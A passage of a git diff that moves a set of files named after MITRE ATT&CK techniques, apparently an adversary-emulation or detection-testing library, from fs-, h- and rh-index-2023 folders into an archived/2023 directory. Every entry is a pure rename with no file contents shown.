rename to archived/2023/fs-index-2023/techniques/Discovery/T1046_networkscan_v1.yml
diff --git a/fs-index-2023/techniques/Discovery/T1087.002_adfind_bulk_v1.yml b/archived/2023/fs-index-2023/techniques/Discovery/T1087.002_adfind_bulk_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/Discovery/T1087.002_adfind_bulk_v1.yml
rename to archived/2023/fs-index-2023/techniques/Discovery/T1087.002_adfind_bulk_v1.yml
diff --git a/fs-index-2023/techniques/Discovery/T1087.002_ldap_users_v1.yml b/archived/2023/fs-index-2023/techniques/Discovery/T1087.002_ldap_users_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/Discovery/T1087.002_ldap_users_v1.yml
rename to archived/2023/fs-index-2023/techniques/Discovery/T1087.002_ldap_users_v1.yml
diff --git a/fs-index-2023/techniques/Discovery/T1087.002_net_domainadmins_v1.yml b/archived/2023/fs-index-2023/techniques/Discovery/T1087.002_net_domainadmins_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/Discovery/T1087.002_net_domainadmins_v1.yml
rename to archived/2023/fs-index-2023/techniques/Discovery/T1087.002_net_domainadmins_v1.yml
diff --git a/fs-index-2023/techniques/Discovery/T1087.002_net_user_groups_v1.yml b/archived/2023/fs-index-2023/techniques/Discovery/T1087.002_net_user_groups_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/Discovery/T1087.002_net_user_groups_v1.yml
rename to archived/2023/fs-index-2023/techniques/Discovery/T1087.002_net_user_groups_v1.yml
diff --git a/fs-index-2023/techniques/Discovery/T1135_netview_shares_v1.yml b/archived/2023/fs-index-2023/techniques/Discovery/T1135_netview_shares_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/Discovery/T1135_netview_shares_v1.yml
rename to archived/2023/fs-index-2023/techniques/Discovery/T1135_netview_shares_v1.yml
diff --git a/fs-index-2023/techniques/Discovery/T1482_nltest_all_v1.yml b/archived/2023/fs-index-2023/techniques/Discovery/T1482_nltest_all_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/Discovery/T1482_nltest_all_v1.yml
rename to archived/2023/fs-index-2023/techniques/Discovery/T1482_nltest_all_v1.yml
diff --git a/fs-index-2023/techniques/Execution/T1106_exe_v1.yml b/archived/2023/fs-index-2023/techniques/Execution/T1106_exe_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/Execution/T1106_exe_v1.yml
rename to archived/2023/fs-index-2023/techniques/Execution/T1106_exe_v1.yml
diff --git a/fs-index-2023/techniques/Execution/T1204.002_macro_hta_v1.yml b/archived/2023/fs-index-2023/techniques/Execution/T1204.002_macro_hta_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/Execution/T1204.002_macro_hta_v1.yml
rename to archived/2023/fs-index-2023/techniques/Execution/T1204.002_macro_hta_v1.yml
diff --git a/fs-index-2023/techniques/Execution/T1204.002_macro_v1.yml b/archived/2023/fs-index-2023/techniques/Execution/T1204.002_macro_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/Execution/T1204.002_macro_v1.yml
rename to archived/2023/fs-index-2023/techniques/Execution/T1204.002_macro_v1.yml
diff --git a/fs-index-2023/techniques/Exfiltration/T1048.003_httpexfil_v2.yml b/archived/2023/fs-index-2023/techniques/Exfiltration/T1048.003_httpexfil_v2.yml
similarity index 100%
rename from fs-index-2023/techniques/Exfiltration/T1048.003_httpexfil_v2.yml
rename to archived/2023/fs-index-2023/techniques/Exfiltration/T1048.003_httpexfil_v2.yml
diff --git a/fs-index-2023/techniques/Exfiltration/T1567.002_mega_rclone_v1.yml b/archived/2023/fs-index-2023/techniques/Exfiltration/T1567.002_mega_rclone_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/Exfiltration/T1567.002_mega_rclone_v1.yml
rename to archived/2023/fs-index-2023/techniques/Exfiltration/T1567.002_mega_rclone_v1.yml
diff --git a/fs-index-2023/techniques/Impact/T1021.002_remote_ransomware_v2.yml b/archived/2023/fs-index-2023/techniques/Impact/T1021.002_remote_ransomware_v2.yml
similarity index 100%
rename from fs-index-2023/techniques/Impact/T1021.002_remote_ransomware_v2.yml
rename to archived/2023/fs-index-2023/techniques/Impact/T1021.002_remote_ransomware_v2.yml
diff --git a/fs-index-2023/techniques/Impact/T1486_ransomware_v3.yml b/archived/2023/fs-index-2023/techniques/Impact/T1486_ransomware_v3.yml
similarity index 100%
rename from fs-index-2023/techniques/Impact/T1486_ransomware_v3.yml
rename to archived/2023/fs-index-2023/techniques/Impact/T1486_ransomware_v3.yml
diff --git a/fs-index-2023/techniques/InitialAccess/T1027.006_html_smuggle_email_v1.yml b/archived/2023/fs-index-2023/techniques/InitialAccess/T1027.006_html_smuggle_email_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/InitialAccess/T1027.006_html_smuggle_email_v1.yml
rename to archived/2023/fs-index-2023/techniques/InitialAccess/T1027.006_html_smuggle_email_v1.yml
diff --git a/fs-index-2023/techniques/InitialAccess/T1078_simultaneouslogin_v1.yml b/archived/2023/fs-index-2023/techniques/InitialAccess/T1078_simultaneouslogin_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/InitialAccess/T1078_simultaneouslogin_v1.yml
rename to archived/2023/fs-index-2023/techniques/InitialAccess/T1078_simultaneouslogin_v1.yml
diff --git a/fs-index-2023/techniques/InitialAccess/T1078_suspicious_login_v3.yml b/archived/2023/fs-index-2023/techniques/InitialAccess/T1078_suspicious_login_v3.yml
similarity index 100%
rename from fs-index-2023/techniques/InitialAccess/T1078_suspicious_login_v3.yml
rename to archived/2023/fs-index-2023/techniques/InitialAccess/T1078_suspicious_login_v3.yml
diff --git a/fs-index-2023/techniques/InitialAccess/T1110.003_externalspray_v2.yml b/archived/2023/fs-index-2023/techniques/InitialAccess/T1110.003_externalspray_v2.yml
similarity index 100%
rename from fs-index-2023/techniques/InitialAccess/T1110.003_externalspray_v2.yml
rename to archived/2023/fs-index-2023/techniques/InitialAccess/T1110.003_externalspray_v2.yml
diff --git a/fs-index-2023/techniques/InitialAccess/T1566.001_zipped_iso_v1.yml b/archived/2023/fs-index-2023/techniques/InitialAccess/T1566.001_zipped_iso_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/InitialAccess/T1566.001_zipped_iso_v1.yml
rename to archived/2023/fs-index-2023/techniques/InitialAccess/T1566.001_zipped_iso_v1.yml
diff --git a/fs-index-2023/techniques/InitialAccess/T1566.001_zipped_macro_v1.yml b/archived/2023/fs-index-2023/techniques/InitialAccess/T1566.001_zipped_macro_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/InitialAccess/T1566.001_zipped_macro_v1.yml
rename to archived/2023/fs-index-2023/techniques/InitialAccess/T1566.001_zipped_macro_v1.yml
diff --git a/fs-index-2023/techniques/InitialAccess/T1566.002_spl_iso_v1.yml b/archived/2023/fs-index-2023/techniques/InitialAccess/T1566.002_spl_iso_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/InitialAccess/T1566.002_spl_iso_v1.yml
rename to archived/2023/fs-index-2023/techniques/InitialAccess/T1566.002_spl_iso_v1.yml
diff --git a/fs-index-2023/techniques/InitialAccess/T1621_mfa_spam_v1.yml b/archived/2023/fs-index-2023/techniques/InitialAccess/T1621_mfa_spam_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/InitialAccess/T1621_mfa_spam_v1.yml
rename to archived/2023/fs-index-2023/techniques/InitialAccess/T1621_mfa_spam_v1.yml
diff --git a/fs-index-2023/techniques/LateralMovement/T1021.001_rdp_v2.yml b/archived/2023/fs-index-2023/techniques/LateralMovement/T1021.001_rdp_v2.yml
similarity index 100%
rename from fs-index-2023/techniques/LateralMovement/T1021.001_rdp_v2.yml
rename to archived/2023/fs-index-2023/techniques/LateralMovement/T1021.001_rdp_v2.yml
diff --git a/fs-index-2023/techniques/LateralMovement/T1021.002_smbc2_v1.yml b/archived/2023/fs-index-2023/techniques/LateralMovement/T1021.002_smbc2_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/LateralMovement/T1021.002_smbc2_v1.yml
rename to archived/2023/fs-index-2023/techniques/LateralMovement/T1021.002_smbc2_v1.yml
diff --git a/fs-index-2023/techniques/LateralMovement/T1021.003_scheduledtask_v2.yml b/archived/2023/fs-index-2023/techniques/LateralMovement/T1021.003_scheduledtask_v2.yml
similarity index 100%
rename from fs-index-2023/techniques/LateralMovement/T1021.003_scheduledtask_v2.yml
rename to archived/2023/fs-index-2023/techniques/LateralMovement/T1021.003_scheduledtask_v2.yml
diff --git a/fs-index-2023/techniques/LateralMovement/T1021.003_wmipcc_v1.yml b/archived/2023/fs-index-2023/techniques/LateralMovement/T1021.003_wmipcc_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/LateralMovement/T1021.003_wmipcc_v1.yml
rename to archived/2023/fs-index-2023/techniques/LateralMovement/T1021.003_wmipcc_v1.yml
diff --git a/fs-index-2023/techniques/LateralMovement/T1057_processdiscovery_remote_v1.yml b/archived/2023/fs-index-2023/techniques/LateralMovement/T1057_processdiscovery_remote_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/LateralMovement/T1057_processdiscovery_remote_v1.yml
rename to archived/2023/fs-index-2023/techniques/LateralMovement/T1057_processdiscovery_remote_v1.yml
diff --git a/fs-index-2023/techniques/LateralMovement/T1570_execopy_v1.yml b/archived/2023/fs-index-2023/techniques/LateralMovement/T1570_execopy_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/LateralMovement/T1570_execopy_v1.yml
rename to archived/2023/fs-index-2023/techniques/LateralMovement/T1570_execopy_v1.yml
diff --git a/fs-index-2023/techniques/Persistence/T1053.005_schtask_v7.yml b/archived/2023/fs-index-2023/techniques/Persistence/T1053.005_schtask_v7.yml
similarity index 100%
rename from fs-index-2023/techniques/Persistence/T1053.005_schtask_v7.yml
rename to archived/2023/fs-index-2023/techniques/Persistence/T1053.005_schtask_v7.yml
diff --git a/fs-index-2023/techniques/Persistence/T1136.001_newlocaladmin_v1.yml b/archived/2023/fs-index-2023/techniques/Persistence/T1136.001_newlocaladmin_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/Persistence/T1136.001_newlocaladmin_v1.yml
rename to archived/2023/fs-index-2023/techniques/Persistence/T1136.001_newlocaladmin_v1.yml
diff --git a/fs-index-2023/techniques/Persistence/T1543.003_newservice_reg_v1.yml b/archived/2023/fs-index-2023/techniques/Persistence/T1543.003_newservice_reg_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/Persistence/T1543.003_newservice_reg_v1.yml
rename to archived/2023/fs-index-2023/techniques/Persistence/T1543.003_newservice_reg_v1.yml
diff --git a/fs-index-2023/techniques/Persistence/T1547.001_runkey_v3.yml b/archived/2023/fs-index-2023/techniques/Persistence/T1547.001_runkey_v3.yml
similarity index 100%
rename from fs-index-2023/techniques/Persistence/T1547.001_runkey_v3.yml
rename to archived/2023/fs-index-2023/techniques/Persistence/T1547.001_runkey_v3.yml
diff --git a/h-index-2023/NOTEBOOK.md b/archived/2023/h-index-2023/NOTEBOOK.md
similarity index 100%
rename from h-index-2023/NOTEBOOK.md
rename to archived/2023/h-index-2023/NOTEBOOK.md
diff --git a/h-index-2023/REQUIREMENTS.md b/archived/2023/h-index-2023/REQUIREMENTS.md
similarity index 100%
rename from h-index-2023/REQUIREMENTS.md
rename to archived/2023/h-index-2023/REQUIREMENTS.md
diff --git a/h-index-2023/h-index-2023-v1.2-summary.csv b/archived/2023/h-index-2023/h-index-2023-v1.2-summary.csv
similarity index 100%
rename from h-index-2023/h-index-2023-v1.2-summary.csv
rename to archived/2023/h-index-2023/h-index-2023-v1.2-summary.csv
diff --git a/h-index-2023/h-index-2023-v1.2.yml b/archived/2023/h-index-2023/h-index-2023-v1.2.yml
similarity index 100%
rename from h-index-2023/h-index-2023-v1.2.yml
rename to archived/2023/h-index-2023/h-index-2023-v1.2.yml
diff --git a/h-index-2023/navigator.json b/archived/2023/h-index-2023/navigator.json
similarity index 100%
rename from h-index-2023/navigator.json
rename to archived/2023/h-index-2023/navigator.json
diff --git a/h-index-2023/techniques/Collection/T1056.001_keylog_v2.yml b/archived/2023/h-index-2023/techniques/Collection/T1056.001_keylog_v2.yml
similarity index 100%
rename from h-index-2023/techniques/Collection/T1056.001_keylog_v2.yml
rename to archived/2023/h-index-2023/techniques/Collection/T1056.001_keylog_v2.yml
diff --git a/h-index-2023/techniques/Collection/T1560.001_7zip_v1.yml b/archived/2023/h-index-2023/techniques/Collection/T1560.001_7zip_v1.yml
similarity index 100%
rename from h-index-2023/techniques/Collection/T1560.001_7zip_v1.yml
rename to archived/2023/h-index-2023/techniques/Collection/T1560.001_7zip_v1.yml
diff --git a/h-index-2023/techniques/CommandandControl/T1071.001_httpc2_v3.yml b/archived/2023/h-index-2023/techniques/CommandandControl/T1071.001_httpc2_v3.yml
similarity index 100%
rename from h-index-2023/techniques/CommandandControl/T1071.001_httpc2_v3.yml
rename to archived/2023/h-index-2023/techniques/CommandandControl/T1071.001_httpc2_v3.yml
diff --git a/h-index-2023/techniques/CommandandControl/T1071.001_httpsc2_v3.yml b/archived/2023/h-index-2023/techniques/CommandandControl/T1071.001_httpsc2_v3.yml
similarity index 100%
rename from h-index-2023/techniques/CommandandControl/T1071.001_httpsc2_v3.yml
rename to archived/2023/h-index-2023/techniques/CommandandControl/T1071.001_httpsc2_v3.yml
diff --git a/h-index-2023/techniques/CommandandControl/T1071.004_dnstxtc2_v3.yml b/archived/2023/h-index-2023/techniques/CommandandControl/T1071.004_dnstxtc2_v3.yml
similarity index 100%
rename from h-index-2023/techniques/CommandandControl/T1071.004_dnstxtc2_v3.yml
rename to archived/2023/h-index-2023/techniques/CommandandControl/T1071.004_dnstxtc2_v3.yml
diff --git a/h-index-2023/techniques/CommandandControl/T1105_tooldownload_v2.yml b/archived/2023/h-index-2023/techniques/CommandandControl/T1105_tooldownload_v2.yml
similarity index 100%
rename from h-index-2023/techniques/CommandandControl/T1105_tooldownload_v2.yml
rename to archived/2023/h-index-2023/techniques/CommandandControl/T1105_tooldownload_v2.yml
diff --git a/h-index-2023/techniques/CommandandControl/T1219_remote_assist_v1.yml b/archived/2023/h-index-2023/techniques/CommandandControl/T1219_remote_assist_v1.yml
similarity index 100%
rename from h-index-2023/techniques/CommandandControl/T1219_remote_assist_v1.yml
rename to archived/2023/h-index-2023/techniques/CommandandControl/T1219_remote_assist_v1.yml
diff --git a/h-index-2023/techniques/CredentialAccess/T1003.001_creddumpmemory_v3.yml b/archived/2023/h-index-2023/techniques/CredentialAccess/T1003.001_creddumpmemory_v3.yml
similarity index 100%
rename from h-index-2023/techniques/CredentialAccess/T1003.001_creddumpmemory_v3.yml
rename to archived/2023/h-index-2023/techniques/CredentialAccess/T1003.001_creddumpmemory_v3.yml
diff --git a/h-index-2023/techniques/CredentialAccess/T1003.001_procdump_v2.yml b/archived/2023/h-index-2023/techniques/CredentialAccess/T1003.001_procdump_v2.yml
similarity index 100%
rename from h-index-2023/techniques/CredentialAccess/T1003.001_procdump_v2.yml
rename to archived/2023/h-index-2023/techniques/CredentialAccess/T1003.001_procdump_v2.yml
diff --git a/h-index-2023/techniques/CredentialAccess/T1003.001_processhacker_v1.yml b/archived/2023/h-index-2023/techniques/CredentialAccess/T1003.001_processhacker_v1.yml
similarity index 100%
rename from h-index-2023/techniques/CredentialAccess/T1003.001_processhacker_v1.yml
rename to archived/2023/h-index-2023/techniques/CredentialAccess/T1003.001_processhacker_v1.yml
diff --git a/h-index-2023/techniques/CredentialAccess/T1003.002_hashdump_v1.yml b/archived/2023/h-index-2023/techniques/CredentialAccess/T1003.002_hashdump_v1.yml
similarity index 100%
rename from h-index-2023/techniques/CredentialAccess/T1003.002_hashdump_v1.yml
rename to archived/2023/h-index-2023/techniques/CredentialAccess/T1003.002_hashdump_v1.yml
diff --git a/h-index-2023/techniques/CredentialAccess/T1003.002_reg_save_all_v1.yml b/archived/2023/h-index-2023/techniques/CredentialAccess/T1003.002_reg_save_all_v1.yml
similarity index 100%
rename from h-index-2023/techniques/CredentialAccess/T1003.002_reg_save_all_v1.yml
rename to archived/2023/h-index-2023/techniques/CredentialAccess/T1003.002_reg_save_all_v1.yml
diff --git a/h-index-2023/techniques/CredentialAccess/T1003.003_ntds_vssadmin_v1.yml b/archived/2023/h-index-2023/techniques/CredentialAccess/T1003.003_ntds_vssadmin_v1.yml
similarity index 100%
rename from h-index-2023/techniques/CredentialAccess/T1003.003_ntds_vssadmin_v1.yml
rename to archived/2023/h-index-2023/techniques/CredentialAccess/T1003.003_ntds_vssadmin_v1.yml
diff --git a/h-index-2023/techniques/CredentialAccess/T1555.003_creddumpbrowser_v2.yml b/archived/2023/h-index-2023/techniques/CredentialAccess/T1555.003_creddumpbrowser_v2.yml
similarity index 100%
rename from h-index-2023/techniques/CredentialAccess/T1555.003_creddumpbrowser_v2.yml
rename to archived/2023/h-index-2023/techniques/CredentialAccess/T1555.003_creddumpbrowser_v2.yml
diff --git a/h-index-2023/techniques/DefenseEvasion/T1140_certutil_decode_v2.yml b/archived/2023/h-index-2023/techniques/DefenseEvasion/T1140_certutil_decode_v2.yml
similarity index 100%
rename from h-index-2023/techniques/DefenseEvasion/T1140_certutil_decode_v2.yml
rename to archived/2023/h-index-2023/techniques/DefenseEvasion/T1140_certutil_decode_v2.yml
diff --git a/h-index-2023/techniques/DefenseEvasion/T1218.005_mshta_v2.yml b/archived/2023/h-index-2023/techniques/DefenseEvasion/T1218.005_mshta_v2.yml
similarity index 100%
rename from h-index-2023/techniques/DefenseEvasion/T1218.005_mshta_v2.yml
rename to archived/2023/h-index-2023/techniques/DefenseEvasion/T1218.005_mshta_v2.yml
diff --git a/h-index-2023/techniques/DefenseEvasion/T1218.008_odbcconf_v2.yml b/archived/2023/h-index-2023/techniques/DefenseEvasion/T1218.008_odbcconf_v2.yml
similarity index 100%
rename from h-index-2023/techniques/DefenseEvasion/T1218.008_odbcconf_v2.yml
rename to archived/2023/h-index-2023/techniques/DefenseEvasion/T1218.008_odbcconf_v2.yml
diff --git a/h-index-2023/techniques/DefenseEvasion/T1218.010_regsvr32_v3.yml b/archived/2023/h-index-2023/techniques/DefenseEvasion/T1218.010_regsvr32_v3.yml
similarity index 100%
rename from h-index-2023/techniques/DefenseEvasion/T1218.010_regsvr32_v3.yml
rename to archived/2023/h-index-2023/techniques/DefenseEvasion/T1218.010_regsvr32_v3.yml
diff --git a/h-index-2023/techniques/DefenseEvasion/T1218.011_rundll32_v1.yml b/archived/2023/h-index-2023/techniques/DefenseEvasion/T1218.011_rundll32_v1.yml
similarity index 100%
rename from h-index-2023/techniques/DefenseEvasion/T1218.011_rundll32_v1.yml
rename to archived/2023/h-index-2023/techniques/DefenseEvasion/T1218.011_rundll32_v1.yml
diff --git a/h-index-2023/techniques/DefenseEvasion/T1548.002_uacbypass_v3.yml b/archived/2023/h-index-2023/techniques/DefenseEvasion/T1548.002_uacbypass_v3.yml
similarity index 100%
rename from h-index-2023/techniques/DefenseEvasion/T1548.002_uacbypass_v3.yml
rename to archived/2023/h-index-2023/techniques/DefenseEvasion/T1548.002_uacbypass_v3.yml
diff --git a/h-index-2023/techniques/Discovery/T1046_networkscan_v1.yml b/archived/2023/h-index-2023/techniques/Discovery/T1046_networkscan_v1.yml
similarity index 100%
rename from h-index-2023/techniques/Discovery/T1046_networkscan_v1.yml
rename to archived/2023/h-index-2023/techniques/Discovery/T1046_networkscan_v1.yml
diff --git a/h-index-2023/techniques/Discovery/T1057_processdiscovery_v1.yml b/archived/2023/h-index-2023/techniques/Discovery/T1057_processdiscovery_v1.yml
similarity index 100%
rename from h-index-2023/techniques/Discovery/T1057_processdiscovery_v1.yml
rename to archived/2023/h-index-2023/techniques/Discovery/T1057_processdiscovery_v1.yml
diff --git a/h-index-2023/techniques/Discovery/T1087.001_net_localgroup_v1.yml b/archived/2023/h-index-2023/techniques/Discovery/T1087.001_net_localgroup_v1.yml
similarity index 100%
rename from h-index-2023/techniques/Discovery/T1087.001_net_localgroup_v1.yml
rename to archived/2023/h-index-2023/techniques/Discovery/T1087.001_net_localgroup_v1.yml
diff --git a/h-index-2023/techniques/Discovery/T1087.002_adfind_bulk_v1.yml b/archived/2023/h-index-2023/techniques/Discovery/T1087.002_adfind_bulk_v1.yml
similarity index 100%
rename from h-index-2023/techniques/Discovery/T1087.002_adfind_bulk_v1.yml
rename to archived/2023/h-index-2023/techniques/Discovery/T1087.002_adfind_bulk_v1.yml
diff --git a/h-index-2023/techniques/Discovery/T1087.002_net_domainadmins_v1.yml b/archived/2023/h-index-2023/techniques/Discovery/T1087.002_net_domainadmins_v1.yml
similarity index 100%
rename from h-index-2023/techniques/Discovery/T1087.002_net_domainadmins_v1.yml
rename to archived/2023/h-index-2023/techniques/Discovery/T1087.002_net_domainadmins_v1.yml
diff --git a/h-index-2023/techniques/Discovery/T1087.002_setspn_collection_v1.yml b/archived/2023/h-index-2023/techniques/Discovery/T1087.002_setspn_collection_v1.yml
similarity index 100%
rename from h-index-2023/techniques/Discovery/T1087.002_setspn_collection_v1.yml
rename to archived/2023/h-index-2023/techniques/Discovery/T1087.002_setspn_collection_v1.yml
diff --git a/h-index-2023/techniques/Discovery/T1135_netview_shares_v1.yml b/archived/2023/h-index-2023/techniques/Discovery/T1135_netview_shares_v1.yml
similarity index 100%
rename from h-index-2023/techniques/Discovery/T1135_netview_shares_v1.yml
rename to archived/2023/h-index-2023/techniques/Discovery/T1135_netview_shares_v1.yml
diff --git a/h-index-2023/techniques/Discovery/T1482_nltest_all_v1.yml b/archived/2023/h-index-2023/techniques/Discovery/T1482_nltest_all_v1.yml
similarity index 100%
rename from h-index-2023/techniques/Discovery/T1482_nltest_all_v1.yml
rename to archived/2023/h-index-2023/techniques/Discovery/T1482_nltest_all_v1.yml
diff --git a/h-index-2023/techniques/Discovery/T1518.001_securitydiscovery_v3.yml b/archived/2023/h-index-2023/techniques/Discovery/T1518.001_securitydiscovery_v3.yml
similarity index 100%
rename from h-index-2023/techniques/Discovery/T1518.001_securitydiscovery_v3.yml
rename to archived/2023/h-index-2023/techniques/Discovery/T1518.001_securitydiscovery_v3.yml
diff --git a/h-index-2023/techniques/Execution/T1106_exe_v1.yml b/archived/2023/h-index-2023/techniques/Execution/T1106_exe_v1.yml
similarity index 100%
rename from h-index-2023/techniques/Execution/T1106_exe_v1.yml
rename to archived/2023/h-index-2023/techniques/Execution/T1106_exe_v1.yml
diff --git a/h-index-2023/techniques/Execution/T1204.002_macro_hta_v1.yml b/archived/2023/h-index-2023/techniques/Execution/T1204.002_macro_hta_v1.yml
similarity index 100%
rename from h-index-2023/techniques/Execution/T1204.002_macro_hta_v1.yml
rename to archived/2023/h-index-2023/techniques/Execution/T1204.002_macro_hta_v1.yml
diff --git a/h-index-2023/techniques/Execution/T1204.002_macro_v1.yml b/archived/2023/h-index-2023/techniques/Execution/T1204.002_macro_v1.yml
similarity index 100%
rename from h-index-2023/techniques/Execution/T1204.002_macro_v1.yml
rename to archived/2023/h-index-2023/techniques/Execution/T1204.002_macro_v1.yml
diff --git a/h-index-2023/techniques/Exfiltration/T1041_httpc2exfil_v2.yml b/archived/2023/h-index-2023/techniques/Exfiltration/T1041_httpc2exfil_v2.yml
similarity index 100%
rename from h-index-2023/techniques/Exfiltration/T1041_httpc2exfil_v2.yml
rename to archived/2023/h-index-2023/techniques/Exfiltration/T1041_httpc2exfil_v2.yml
diff --git a/h-index-2023/techniques/Exfiltration/T1567.002_mega_rclone_v1.yml b/archived/2023/h-index-2023/techniques/Exfiltration/T1567.002_mega_rclone_v1.yml
similarity index 100%
rename from h-index-2023/techniques/Exfiltration/T1567.002_mega_rclone_v1.yml
rename to archived/2023/h-index-2023/techniques/Exfiltration/T1567.002_mega_rclone_v1.yml
diff --git a/h-index-2023/techniques/Impact/T1021.002_remote_ransomware_v2.yml b/archived/2023/h-index-2023/techniques/Impact/T1021.002_remote_ransomware_v2.yml
similarity index 100%
rename from h-index-2023/techniques/Impact/T1021.002_remote_ransomware_v2.yml
rename to archived/2023/h-index-2023/techniques/Impact/T1021.002_remote_ransomware_v2.yml
diff --git a/h-index-2023/techniques/Impact/T1486_ransomware_v3.yml b/archived/2023/h-index-2023/techniques/Impact/T1486_ransomware_v3.yml
similarity index 100%
rename from h-index-2023/techniques/Impact/T1486_ransomware_v3.yml
rename to archived/2023/h-index-2023/techniques/Impact/T1486_ransomware_v3.yml
diff --git a/h-index-2023/techniques/InitialAccess/T1027.006_html_smuggle_email_v1.yml b/archived/2023/h-index-2023/techniques/InitialAccess/T1027.006_html_smuggle_email_v1.yml
similarity index 100%
rename from h-index-2023/techniques/InitialAccess/T1027.006_html_smuggle_email_v1.yml
rename to archived/2023/h-index-2023/techniques/InitialAccess/T1027.006_html_smuggle_email_v1.yml
diff --git a/h-index-2023/techniques/InitialAccess/T1566.001_encarchive_macro_v1.yml b/archived/2023/h-index-2023/techniques/InitialAccess/T1566.001_encarchive_macro_v1.yml
similarity index 100%
rename from h-index-2023/techniques/InitialAccess/T1566.001_encarchive_macro_v1.yml
rename to archived/2023/h-index-2023/techniques/InitialAccess/T1566.001_encarchive_macro_v1.yml
diff --git a/h-index-2023/techniques/InitialAccess/T1566.001_zipped_iso_v1.yml b/archived/2023/h-index-2023/techniques/InitialAccess/T1566.001_zipped_iso_v1.yml
similarity index 100%
rename from h-index-2023/techniques/InitialAccess/T1566.001_zipped_iso_v1.yml
rename to archived/2023/h-index-2023/techniques/InitialAccess/T1566.001_zipped_iso_v1.yml
diff --git a/h-index-2023/techniques/InitialAccess/T1566.001_zipped_js_v1.yml b/archived/2023/h-index-2023/techniques/InitialAccess/T1566.001_zipped_js_v1.yml
similarity index 100%
rename from h-index-2023/techniques/InitialAccess/T1566.001_zipped_js_v1.yml
rename to archived/2023/h-index-2023/techniques/InitialAccess/T1566.001_zipped_js_v1.yml
diff --git a/h-index-2023/techniques/InitialAccess/T1566.002_zipped_iso_v1.yml b/archived/2023/h-index-2023/techniques/InitialAccess/T1566.002_zipped_iso_v1.yml
similarity index 100%
rename from h-index-2023/techniques/InitialAccess/T1566.002_zipped_iso_v1.yml
rename to archived/2023/h-index-2023/techniques/InitialAccess/T1566.002_zipped_iso_v1.yml
diff --git a/h-index-2023/techniques/InitialAccess/T1621_mfa_spam_v1.yml b/archived/2023/h-index-2023/techniques/InitialAccess/T1621_mfa_spam_v1.yml
similarity index 100%
rename from h-index-2023/techniques/InitialAccess/T1621_mfa_spam_v1.yml
rename to archived/2023/h-index-2023/techniques/InitialAccess/T1621_mfa_spam_v1.yml
diff --git a/h-index-2023/techniques/LateralMovement/T1021.001_rdp_v2.yml b/archived/2023/h-index-2023/techniques/LateralMovement/T1021.001_rdp_v2.yml
similarity index 100%
rename from h-index-2023/techniques/LateralMovement/T1021.001_rdp_v2.yml
rename to archived/2023/h-index-2023/techniques/LateralMovement/T1021.001_rdp_v2.yml
diff --git a/h-index-2023/techniques/LateralMovement/T1021.003_wmipcc_v1.yml b/archived/2023/h-index-2023/techniques/LateralMovement/T1021.003_wmipcc_v1.yml
similarity index 100%
rename from h-index-2023/techniques/LateralMovement/T1021.003_wmipcc_v1.yml
rename to archived/2023/h-index-2023/techniques/LateralMovement/T1021.003_wmipcc_v1.yml
diff --git a/h-index-2023/techniques/Persistence/T1053.005_schtask_v7.yml b/archived/2023/h-index-2023/techniques/Persistence/T1053.005_schtask_v7.yml
similarity index 100%
rename from h-index-2023/techniques/Persistence/T1053.005_schtask_v7.yml
rename to archived/2023/h-index-2023/techniques/Persistence/T1053.005_schtask_v7.yml
diff --git a/h-index-2023/techniques/Persistence/T1136.001_newlocaladmin_v1.yml b/archived/2023/h-index-2023/techniques/Persistence/T1136.001_newlocaladmin_v1.yml
similarity index 100%
rename from h-index-2023/techniques/Persistence/T1136.001_newlocaladmin_v1.yml
rename to archived/2023/h-index-2023/techniques/Persistence/T1136.001_newlocaladmin_v1.yml
diff --git a/h-index-2023/techniques/Persistence/T1543.003_newservice_reg_v1.yml b/archived/2023/h-index-2023/techniques/Persistence/T1543.003_newservice_reg_v1.yml
similarity index 100%
rename from h-index-2023/techniques/Persistence/T1543.003_newservice_reg_v1.yml
rename to archived/2023/h-index-2023/techniques/Persistence/T1543.003_newservice_reg_v1.yml
diff --git a/h-index-2023/techniques/Persistence/T1547.001_runonce_v2.yml b/archived/2023/h-index-2023/techniques/Persistence/T1547.001_runonce_v2.yml
similarity index 100%
rename from h-index-2023/techniques/Persistence/T1547.001_runonce_v2.yml
rename to archived/2023/h-index-2023/techniques/Persistence/T1547.001_runonce_v2.yml
diff --git a/h-index-2023/techniques/Persistence/T1547.001_startupfolder_v1.yml b/archived/2023/h-index-2023/techniques/Persistence/T1547.001_startupfolder_v1.yml
similarity index 100%
rename from h-index-2023/techniques/Persistence/T1547.001_startupfolder_v1.yml
rename to archived/2023/h-index-2023/techniques/Persistence/T1547.001_startupfolder_v1.yml
diff --git a/h-index-2023/techniques/Persistence/T1564.002_hide_user_logon_v1.yml b/archived/2023/h-index-2023/techniques/Persistence/T1564.002_hide_user_logon_v1.yml
similarity index 100%
rename from h-index-2023/techniques/Persistence/T1564.002_hide_user_logon_v1.yml
rename to archived/2023/h-index-2023/techniques/Persistence/T1564.002_hide_user_logon_v1.yml
diff --git a/rh-index-2023/NOTEBOOK.md b/archived/2023/rh-index-2023/NOTEBOOK.md
similarity index 100%
rename from rh-index-2023/NOTEBOOK.md
rename to archived/2023/rh-index-2023/NOTEBOOK.md
diff --git a/rh-index-2023/REQUIREMENTS.md b/archived/2023/rh-index-2023/REQUIREMENTS.md
similarity index 100%
rename from rh-index-2023/REQUIREMENTS.md
rename to archived/2023/rh-index-2023/REQUIREMENTS.md
diff --git a/rh-index-2023/navigator.json b/archived/2023/rh-index-2023/navigator.json
similarity index 100%
